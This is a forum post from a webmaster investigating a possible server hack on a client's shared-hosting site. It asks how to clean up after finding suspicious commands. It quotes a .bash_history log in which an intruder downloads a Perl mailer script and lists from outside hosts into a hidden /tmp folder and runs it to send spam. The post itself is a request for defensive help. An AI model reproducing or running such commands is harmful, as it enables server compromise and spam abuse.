homepage Welcome to WebmasterWorld Guest from 54.226.168.96
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Accredited PayPal World Seller

Home / Forums Index / Code, Content, and Presentation / Apache Web Server
Forum Library, Charter, Moderators: Ocean10000 & incrediBILL & phranque

Apache Web Server Forum

    
Server hack - help please! .bash history spam?
drl1




msg:4013251
 2:15 am on Oct 26, 2009 (gmt 0)

Hello everyone,
Not sure if I should post this here or in the search forum. I have a new client that came to me because his site's rankings plummetted a year ago. The site is still indexed and I started checking for a server hack.
The site is on a shared server and malware is detected on other sites within that server.
I started checking files on the site line by line. In the .bash_history file I saw the following code:

cd /tmp
mkdir .dc
cd .dc
wget infbr.iespana.es/enviar.pl
echo revbrk@hotmail.com > rev.txt
perl enviar.pl rev.txt sudfhsd sduhf usdhf
wget [topmagia.ru...]
wget [topmagia.ru...]
perl enviar.pl novaboa.txt ocarteiro@ocarteiro.com.br "O carteiro enviou este cartao para ti" ocarteiro.txt

Which fits the profile of spam. I plan to call the hosting company tomorrow and request the site be moved to another server.

My question is, can I remove the content of this file (what and how much should I delete?). And are there any suggestions on where else I should look to see what this code has done?

I am not a whiz when it comes to server-side files. Any help would be greatly appreaciated!

 

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / Apache Web Server
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
© Webmaster World 1996-2014 all rights reserved